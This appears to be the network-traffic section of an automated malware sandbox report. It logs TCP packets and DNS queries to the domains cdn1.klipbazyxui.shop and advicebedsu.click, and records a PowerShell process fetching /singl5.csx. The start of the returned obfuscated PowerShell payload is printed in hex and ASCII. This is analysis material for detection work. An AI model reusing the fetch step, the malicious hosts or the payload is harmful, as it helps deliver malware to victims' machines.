                                                                                    Dec 30, 2024 09:18:12.320977926 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:12.395252943 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:12.395275116 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:12.395334005 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:12.395353079 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:12.395376921 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:12.395392895 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:12.399607897 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:12.399632931 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:12.399708986 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:12.399717093 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:12.399751902 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:12.400333881 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:12.400352955 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:12.400397062 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:12.400403976 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:12.400533915 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:12.400557041 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:12.400587082 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:12.400593042 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:12.400619984 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:12.400644064 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:12.402364016 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:12.402383089 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:12.402436018 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:12.402442932 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:12.402487040 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:12.404854059 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:12.404875040 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:12.404927969 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:12.404933929 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:12.404963017 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:12.404980898 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:12.405069113 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:12.405083895 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:12.405128956 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:12.405134916 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:12.405160904 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:12.405174017 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:12.405292988 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:12.405309916 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:12.405345917 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:12.405352116 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:12.405376911 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:12.405400991 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:12.479798079 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:12.479846954 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:12.479912996 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:12.479937077 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:12.479954004 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:12.479957104 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:12.479979992 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:12.480271101 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:12.483582973 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:19:23.390877008 CET49916443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:23.390887976 CET44349916104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:23.390961885 CET49916443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:23.391840935 CET49916443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:23.391850948 CET44349916104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:23.829914093 CET44349916104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:23.830003023 CET49916443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:23.831682920 CET49916443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:23.831690073 CET44349916104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:23.831913948 CET44349916104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:23.873650074 CET49916443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:23.873681068 CET49916443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:23.873714924 CET44349916104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:24.289218903 CET44349916104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:24.289303064 CET44349916104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:24.289352894 CET49916443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:24.292109013 CET49916443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:24.292118073 CET44349916104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:24.292129040 CET49916443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:24.292135954 CET44349916104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:24.307151079 CET49922443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:24.307187080 CET44349922104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:24.307241917 CET49922443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:24.307492018 CET49922443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:24.307507992 CET44349922104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:24.744976997 CET44349922104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:24.745173931 CET49922443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:24.905050993 CET49922443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:24.905069113 CET44349922104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:24.905303955 CET44349922104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:24.907002926 CET49922443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:24.907020092 CET49922443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:24.907078981 CET44349922104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:25.342335939 CET44349922104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:25.342407942 CET44349922104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:25.342437029 CET44349922104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:25.342473984 CET44349922104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:25.342477083 CET49922443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:25.342489004 CET44349922104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:25.342524052 CET49922443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:25.342526913 CET44349922104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:25.342559099 CET44349922104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:25.342586040 CET44349922104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:25.342602015 CET49922443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:25.342617989 CET44349922104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:25.342629910 CET49922443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:25.343185902 CET44349922104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:25.343236923 CET49922443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:25.343249083 CET44349922104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:25.424596071 CET44349922104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:25.424629927 CET44349922104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:25.424657106 CET49922443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:25.424665928 CET44349922104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:25.424676895 CET44349922104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:25.424710989 CET49922443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:25.424773932 CET44349922104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:25.424829960 CET49922443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:25.424984932 CET49922443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:25.425008059 CET44349922104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:25.425055981 CET49922443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:25.425070047 CET44349922104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:25.547032118 CET49930443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:25.547090054 CET44349930104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:25.547265053 CET49930443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:25.547728062 CET49930443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:25.547743082 CET44349930104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:25.981690884 CET44349930104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:25.981846094 CET49930443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:25.983062983 CET49930443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:25.983073950 CET44349930104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:25.983280897 CET44349930104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:25.986938000 CET49930443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:25.987068892 CET49930443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:25.987112999 CET44349930104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:25.989835978 CET49930443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:25.989847898 CET44349930104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:26.529170990 CET44349930104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:26.529248953 CET44349930104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:26.529392004 CET49930443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:26.529438019 CET49930443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:26.529453993 CET44349930104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:26.549539089 CET49940443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:26.549573898 CET44349940104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:26.549655914 CET49940443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:26.549902916 CET49940443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:26.549921036 CET44349940104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:26.985646963 CET44349940104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:26.985740900 CET49940443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:26.992559910 CET49940443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:26.992588043 CET44349940104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:26.992786884 CET44349940104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:26.995743990 CET49940443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:26.996046066 CET49940443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:26.996082067 CET44349940104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:27.468041897 CET44349940104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:27.468127966 CET44349940104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:27.468209982 CET49940443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:27.558363914 CET49940443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:27.558386087 CET44349940104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:27.662437916 CET49947443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:27.662473917 CET44349947104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:27.662715912 CET49947443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:27.663242102 CET49947443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:27.663258076 CET44349947104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:28.097337008 CET44349947104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:28.097403049 CET49947443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:28.098831892 CET49947443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:28.098841906 CET44349947104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:28.099051952 CET44349947104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:28.100281000 CET49947443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:28.100446939 CET49947443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:28.100478888 CET44349947104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:28.100528002 CET49947443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:28.100528002 CET49947443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:28.100538969 CET44349947104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:28.143337011 CET44349947104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:28.664830923 CET44349947104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:28.664920092 CET44349947104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:28.665013075 CET49947443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:28.665216923 CET49947443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:28.665231943 CET44349947104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:28.747687101 CET49956443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:28.747725010 CET44349956104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:28.747827053 CET49956443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:28.748128891 CET49956443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:28.748136044 CET44349956104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:29.202158928 CET44349956104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:29.202230930 CET49956443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:29.203438044 CET49956443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:29.203444958 CET44349956104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:29.203653097 CET44349956104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:29.206981897 CET49956443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:29.207079887 CET49956443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:29.207086086 CET44349956104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:29.612770081 CET44349956104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:29.612890959 CET44349956104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:29.613852024 CET49956443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:29.615497112 CET49956443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:29.615520954 CET44349956104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:30.127115011 CET49965443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:30.127127886 CET44349965104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:30.127211094 CET49965443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:30.127458096 CET49965443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:30.127470016 CET44349965104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:30.566009998 CET44349965104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:30.566082954 CET49965443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:30.567302942 CET49965443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:30.567307949 CET44349965104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:30.567542076 CET44349965104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:30.568804979 CET49965443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:30.569592953 CET49965443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:30.569629908 CET44349965104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:30.569758892 CET49965443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:30.569793940 CET44349965104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:30.569911957 CET49965443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:30.569955111 CET44349965104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:30.570103884 CET49965443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:30.570131063 CET44349965104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:30.570280075 CET49965443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:30.570310116 CET44349965104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:30.570497036 CET49965443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:30.570527077 CET44349965104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:30.570534945 CET49965443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:30.570818901 CET49965443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:30.570849895 CET49965443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:30.580055952 CET44349965104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:30.580291986 CET49965443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:30.580322027 CET44349965104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:30.580351114 CET49965443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:30.580364943 CET49965443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:30.580486059 CET49965443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:30.580507040 CET49965443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:30.584753990 CET44349965104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:30.584898949 CET49965443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:30.584925890 CET44349965104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:32.033318043 CET44349965104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:32.033399105 CET44349965104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:32.033451080 CET49965443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:32.033673048 CET49965443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:32.033691883 CET44349965104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:32.042027950 CET49977443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:32.042056084 CET44349977104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:32.042114973 CET49977443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:32.042362928 CET49977443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:32.042371988 CET44349977104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:32.495327950 CET44349977104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:32.495394945 CET49977443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:32.496990919 CET49977443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:32.496997118 CET44349977104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:32.497193098 CET44349977104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:32.498747110 CET49977443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:32.498769999 CET49977443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:32.498800039 CET44349977104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:32.940345049 CET44349977104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:32.940414906 CET44349977104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:32.940483093 CET49977443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:32.940748930 CET49977443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:32.940761089 CET44349977104.21.84.241192.168.2.4
                                                                                    Dec 30, 2024 09:19:32.940773964 CET49977443192.168.2.4104.21.84.241
                                                                                    Dec 30, 2024 09:19:32.940778017 CET44349977104.21.84.241192.168.2.4

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 30, 2024 09:18:05.837017059 CET6136753192.168.2.41.1.1.1
                                                                                    Dec 30, 2024 09:18:05.848458052 CET53613671.1.1.1192.168.2.4
                                                                                    Dec 30, 2024 09:19:23.373507977 CET5536253192.168.2.41.1.1.1
                                                                                    Dec 30, 2024 09:19:23.385745049 CET53553621.1.1.1192.168.2.4

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Dec 30, 2024 09:18:05.837017059 CET192.168.2.41.1.1.10x4819Standard query (0)cdn1.klipbazyxui.shopA (IP address)IN (0x0001)false
                                                                                    Dec 30, 2024 09:19:23.373507977 CET192.168.2.41.1.1.10x1beeStandard query (0)advicebedsu.clickA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Dec 30, 2024 09:18:05.848458052 CET1.1.1.1192.168.2.40x4819No error (0)cdn1.klipbazyxui.shop104.21.72.190A (IP address)IN (0x0001)false
                                                                                    Dec 30, 2024 09:18:05.848458052 CET1.1.1.1192.168.2.40x4819No error (0)cdn1.klipbazyxui.shop172.67.154.95A (IP address)IN (0x0001)false
                                                                                    Dec 30, 2024 09:19:23.385745049 CET1.1.1.1192.168.2.40x1beeNo error (0)advicebedsu.click104.21.84.241A (IP address)IN (0x0001)false
                                                                                    Dec 30, 2024 09:19:23.385745049 CET1.1.1.1192.168.2.40x1beeNo error (0)advicebedsu.click172.67.199.103A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • cdn1.klipbazyxui.shop
                                                                                    • advicebedsu.click

                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.449730104.21.72.1904437792C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-30 08:18:06 UTC81OUTGET /singl5.csx HTTP/1.1
                                                                                    Host: cdn1.klipbazyxui.shop
                                                                                    Connection: Keep-Alive
                                                                                    2024-12-30 08:18:06 UTC998INHTTP/1.1 200 OK
                                                                                    Date: Mon, 30 Dec 2024 08:18:06 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Content-Length: 8307528
                                                                                    Connection: close
                                                                                    X-Powered-By: Express
                                                                                    ETag: W/"7ec348-NHlxONIVlqIDG+bHScsilMqgpS8"
                                                                                    Set-Cookie: connect.sid=s%3ApZrOcbJ_ZJlLzt3Q5HFaqeVt1fbL5XN9.z9nGPkVK8bluQ8q%2B2r7q7t0VlM5yNxhkLz%2BoLXoXG58; Path=/; HttpOnly
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FEKV0%2FpeSP8AJlMLj13qObvwM%2BVl1QwbYOjfJ44%2B%2F4WHADKUXCcunoz1XFfbUDDCLDzP98vpjzzlP1pv5u51mo%2Bj9qefwZ9yNunfjo8cK7hHtP2P0r7B0owTYv2onzlpz%2Buxp6H2fkk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8fa098e5edb64414-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1748&min_rtt=1739&rtt_var=670&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=695&delivery_rate=1611479&cwnd=172&unsent_bytes=0&cid=4112b1be414b8859&ts=420&x=0"
                                                                                    2024-12-30 08:18:06 UTC371INData Raw: 0d 0a 24 79 64 4f 74 77 6b 46 68 20 3d 20 28 28 28 28 28 39 32 38 39 34 31 20 2a 20 2d 31 31 29 20 2b 20 28 28 28 28 31 31 32 38 35 20 2a 20 24 79 64 4f 74 77 6b 46 68 29 20 2b 20 37 31 36 33 36 36 29 20 2b 20 34 35 34 29 29 29 20 2a 20 2d 34 38 37 29 20 2d 20 32 37 33 31 29 20 2b 20 2d 38 38 29 0d 0a 24 52 72 48 56 77 4e 57 46 6b 70 52 20 3d 20 28 28 28 28 28 28 36 38 39 39 38 20 2a 20 28 28 28 28 28 28 34 31 30 37 30 39 20 2a 20 33 36 37 29 20 2b 20 24 52 72 48 56 77 4e 57 46 6b 70 52 29 20 2a 20 24 79 64 4f 74 77 6b 46 68 29 20 2d 20 24 79 64 4f 74 77 6b 46 68 29 20 2d 20 35 39 29 29 29 20 2a 20 28 28 28 28 2d 39 20 2a 20 2d 31 29 20 2d 20 32 36 34 34 35 29 20 2b 20 24 52 72 48 56 77 4e 57 46 6b 70 52 29 29 29 20 2d 20 24 52 72 48 56 77 4e 57 46 6b 70
                                                                                    Data Ascii: $ydOtwkFh = (((((928941 * -11) + ((((11285 * $ydOtwkFh) + 716366) + 454))) * -487) - 2731) + -88)$RrHVwNWFkpR = ((((((68998 * ((((((410709 * 367) + $RrHVwNWFkpR) * $ydOtwkFh) - $ydOtwkFh) - 59))) * ((((-9 * -1) - 26445) + $RrHVwNWFkpR))) - $RrHVwNWFkp
                                                                                    2024-12-30 08:18:06 UTC1369INData Raw: 72 79 70 20 2b 20 28 28 28 24 4d 6c 6a 77 4a 72 79 70 20 2d 20 2d 31 32 33 31 39 29 20 2d 20 24 79 64 4f 74 77 6b 46 68 29 29 29 20 2b 20 24 79 64 4f 74 77 6b 46 68 29 0d 0a 24 4b 76 48 6f 6a 56 52 4b 6f 20 3d 20 28 28 28 28 24 79 64 4f 74 77 6b 46 68 20 2b 20 39 38 30 29 20 2b 20 24 52 72 48 56 77 4e 57 46 6b 70 52 29 20 2d 20 2d 35 31 35 33 31 29 20 2a 20 24 52 72 48 56 77 4e 57 46 6b 70 52 29 0d 0a 24 79 51 55 49 4d 48 68 57 20 3d 20 28 28 28 28 28 24 4d 6c 6a 77 4a 72 79 70 20 2b 20 24 79 64 4f 74 77 6b 46 68 29 20 2a 20 2d 31 38 33 29 20 2d 20 35 34 32 35 29 20 2b 20 2d 37 38 30 29 20 2a 20 24 79 51 55 49 4d 48 68 57 29 0d 0a 24 6c 4b 76 48 73 76 53 46 4b 68 20 3d 20 28 28 24 79 64 4f 74 77 6b 46 68 20 2d 20 28 28 28 28 28 28 24 6c 4b 76 48 73 76 53
